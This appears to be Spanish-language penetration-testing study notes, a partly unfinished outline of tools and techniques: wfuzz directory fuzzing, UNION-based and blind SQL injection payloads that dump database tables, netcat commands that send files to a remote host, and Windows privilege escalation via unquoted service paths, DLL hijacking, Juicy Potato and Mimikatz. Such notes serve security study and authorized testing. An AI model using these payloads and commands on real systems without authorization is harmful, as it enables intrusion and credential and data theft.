Herramientas generales:
    -Burpsuite:
        -Proxy: Herramienta necesaria para interceptar peticiones HTTP/HTTPS.
        -Repeater: Herramienta utilizada para modificar y manipular una petición.
        -Intruder: Herramienta utilizada para realizar ataques de fuerza bruta/reemplazo de valores.
    -Netcat:
        -Herrmienta liviana para establecer conexiones via TCP/UDP.
            -Establecer una conexión hacia un puerto remoto: nc 1.1.1.1 443 -vvv
            -Recepcionar una conexión desde un host remoto: nc -lvp 443
            -Enviar datos a través de netcat: nc 1.1.1.1 443 < dato.txt
            -Recibir datos a través de netcat: nc -lvp 443 > dato.txt
    -Python3:
        -Lenguaje de programación interpretado de gran versatilidad.
            -Desplegar un servidor web: python3 -m http.server 80
            -Desplegar un servidor ftp: python3 -m pyftpdlib 21
        -Paqueteria impacket:
            -Desplegar un servidor smb: impacket-smbserver remoteShare localShare
            -Desplegar un relay smb: impacket-smbrelayx
        -Responder: Herramienta utilizada para el envenenamiento de peticiones para multiples protocolos, entre ellos HTTP,DNS,SMB,FTP.


Pentest de aplicaciones WEB.
    -Fuzzing: Técnica utilizada para enumerar directorios o ficheros existentes en el sitio web.
        -Wfuzz:
            Fuzzing de directorios: wfuzz -c -L --hc 404 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt http://1.1.1.1/FUZZ
            Fuzzing de subdominios: wfuzz -c -L --hc 404 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -H 'Host: FUZZ.dominio.com' http://dominio.com
            Fuzzing de ficheros(Añadir extensión al final): wfuzz -c -L --hc 404 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt http://1.1.1.1/FUZZ.txt
    -SQLi
        -Error based SQLi: Inyección basada en romper la estructura de la query para visualizar el error, entender la consulta y alterar la misma.
        Posibles payloads a probar: ' ) - ( , . ; : { } 
            -Enumeración de cantidad de columnas: union select 1,2,3,4... (Hasta que el error desaparezca)
            -Enumeración de base de datos utilizando la función "database()": union select 1,2,database();
            -Enumeración de tablas utilizando la base de datos "information": union select 1,2,group_concat(table_name) from information_schema.tables where table_schema = "Nombre de la BD";
            -Enumeración de columnas utilizando la base de datos "information": union select 1,2,group_concat(column_name) from information_schema.columns where table_name = "Nombre de la tabla"'
            -Desplegar información de la tabla: union select 1,2,group_concat(columna1, ":", columna2 SEPARATOR '<br>') from TABLA01;
         -Time boolean SQLi: Inyección basada en la respuesta el boolean de respuesta".
            -Enumeración de base de datos utilizando "like" letra a letra (script): union select 1,2,3 where database() like '%a';-- 
            -Enumeración de tablas utilizando "like" letra a letra (script): union select 1,2,3 from information_schema.tables where table_schema = 'DB' and table_name like 'a%';--
            -Enumeración de columnas utilizando "like" letra a letra (script): union select 1,2,3 from information_schema.columns where table_schema = 'DB' and table_name = 'tabla01' and column_name like '%a' and column_name != 'id';--
         -Time based SQLi: Inyección basada en pausas cuando el condicional es "true".
            -Enumeración de base de datos utilizando "like" y "sleep()"(script): union select 1,sleep(1) and database() like 'd%';--
            -Enumeración de tablas utilizando "like" letra a letra (script): union select 1,sleep(1) from information_schema.tables where table_schema = 'DB' and table_name like 'a%';--
            -Enumeración de columnas utilizando "like" letra a letra (scriptt): union select 1,sleep(1) from information_schema.columns where table_schema = 'DB' and table_name = 'tabla01' and column_name like '%a';--
          
    -XSS
    -XXE
    -SSRF
    -LFI
    -RDI
    -XPath injection
    -LDAP injection
    
Pentest sobre linux.
    -Herramientas
        -linPEAS: Es una herramienta de enumeración e identificación con fines de encontrar posibles vias para escalar privilegios.
    -Descubrimiento de puertos
    -Información de versiones
    -Enumeración
        -Sistema operativo: uname -a
        -Interfaces de red: ip a / ifconfig / 
        -Puertos abiertos de forma local: netstat -anp / ss -lntu / cat /proc/net/tcp | awk '{print $2}' / cat /proc/net/udp | awk '{print $2}'
        -Endpoints asociados: cat /etc/hosts
        
    -Identificación de exploits
    -Troubleshooting
    -Escalación de privilegios
        -Binarios SUID conocidos: Abusando de ficheros que tienen el permiso SUID es posible ejecutar comandos en el contexto de root cuando root es el dueño. Utilizando páginas como https://gtfobins.github.io/ o https://book.hacktricks.xyz/ podemos verificar si los ficheros SUID conocidos cuentan con vulnerabilidades.
        -Binarios SUID no conocidos: Es posible abusar de ficheros SUID 
    -Pivoting
    -BufferOverflow (x86,x64)
    
Pentest sobre windows.
    -Herramientas
        -winPEAS: Es una herramienta de enumeración e identificación con fines de econtrar posibles vias para escalar privilegios.
    -Descubrimiento de puertos
    -Información de versiones
    -Enumeración
        -Enumerar usuarios:
            net user
        -Enumerar parches instalados:
            wmic qfe get Caption,Description,HotFixID,InstalledOn
        -Enumerar sistema en general:
            systeminfo
        -Enumerar estado de Windows Defender(Powershell):
            (Get-Service windefend).Status
        -Enumerar servicios activos:
            wmic service list brief | findstr "Running"
        -Enumerar tareas programadas:
            schtasks
    -Identificación de exploits
    -Troubleshooting
    -Escalación de privilegios
        -DLL Hijacking: Es posible secuestrar la inclusión de una DLL no encontrada por un servicio. Utilizando herramientas como ProcMon, podemos verificar si existe alguna DLL no encontrada en la ejecución de un servicio. En caso de existir y poseer permisos de modificación sobre el directorio en cuestión, podemos incluir una DLL maliciosa para escalar o migrar de privilegios.
        -Unquoted path service: Es posible abusar de servicios mal referenciados, dada la forma en la que Windows busca los binarios dentro de un directorio de servicio y dado que las carpetas de Windows utilizan espacios, Windows intenta añadir el sufijo .exe a cada palabra dentro de un path.
            Ejemplo: C:\Program Files\Servicio Vulnerable\Ruta del binario\Binario.exe -> Windows intentará a añador el .exe a cada sección, dejando la ejecución: C:\Program Files\Servicio.exe, C:\Program Files\Servicio Vulnerable\Ruta.exe, C:\Program Files\Servicio Vulnerable\Ruta del binario\Binario.exe. Es necesario aclarar que es necesario contar con permisos de escritura algun direcotrio para poder incluir el binario malicioso.
        -Token Impersonate: Abusando del privilegio SeImpersonatePrivilege es posible escalar privilegios utilizando Juicy Potato.
            Ejemplo: C:\Users\admin>whoami /priv

                    PRIVILEGES INFORMATION
                    ----------------------

                    Privilege Name                            Description                                                        State
                    ========================================= ================================================================== ========
                    SeImpersonatePrivilege                    Impersonate a client after authentication                          Enabled
        -Credenciales en memoria: Utilizando software como Mimikatz es posible extraer credenciales que se encuentren almacenadas en memoría.
    -Pivoting
    -BufferOverflow (x86,x64)
    
Pentest sobre Active Directory.
    -Herramientas
    -Descubrimiento de puertos
    -Información de versiones
    -Enumeración
    -Ataques a Active Directory
    
Ataque a contraseñas.
    -Crackeado con Jhon
    -Crackeado con Hashcat
    -Rainbow tables
    -Creación de diccionarios
    
Documentación.
    -Estructura informe
    -Lenguaje ejecutivo
    -Lenguaje técnico
    -Footprint
    -Evidencia
